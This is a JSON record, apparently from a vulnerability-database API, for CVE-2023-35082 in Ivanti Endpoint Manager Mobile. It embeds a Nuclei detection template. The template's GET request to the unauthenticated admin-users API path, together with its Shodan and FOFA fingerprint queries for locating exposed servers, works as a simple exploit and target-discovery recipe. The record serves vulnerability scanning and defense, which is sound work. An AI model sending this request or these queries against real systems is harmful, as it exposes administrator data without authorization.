{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2023-35082/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2023-35082/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2023-35082/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2023-35082/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2023-35082/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2023-35082"},"sightings":{"href":"/api/v1/sightings/cve-2023-35082"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2023/CVE-2023-35082.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2023-35082\n\ninfo:\n  name: MobileIron Core - Remote Unauthenticated API Access\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’s security filter chain.\n  impact: |\n    Remote attackers can exploit this vulnerability to gain unauthorized access to sensitive data and perform malicious actions.\n  remediation: Upgrading to the latest version of Ivanti Endpoint Manager Mobile (EPMM)\n  reference:\n    - https://www.rapid7.com/blog/post/2023/08/02/cve-2023-35082-mobileiron-core-unauthenticated-api-access-vulnerability/\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-35082\n    - https://forums.ivanti.com/s/article/CVE-2023-35082-Remote-Unauthenticated-API-Access-Vulnerability-in-MobileIron-Core-11-2-and-older?language=en_US\n    - https://github.com/Chocapikk/CVE-2023-35082\n    - https://github.com/Ostorlab/KEV\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-35082\n    cwe-id: CWE-287\n    epss-score: 0.99999\n    epss-percentile: 0.99996\n    cpe: cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: ivanti\n    product: endpoint_manager_mobile\n    shodan-query:\n      - http.favicon.hash:362091310\n      - http.favicon.hash:\"362091310\"\n    fofa-query: icon_hash=\"362091310\"\n  tags: cve2023,cve,ivanti,mobileiron,epmm,kev,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/mifs/asfV3/api/v2/admins/users\"\n\n    max-size: 100\n    matchers:\n      - type: dsl\n        dsl:\n          - contains_all(body, 'results','userId','name')\n          - contains(header, 'application/json')\n          - status_code == 200\n        condition: and\n# digest: 4a0a00473045022100ce0bdb16f19352fffeb6d87886209b6eb9f534fc575f34079a110d50541c740f0220360fac9335ba130a3683eb501fab26eb175a3abb1973dd402651f3fd159013b4:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2023-35082"}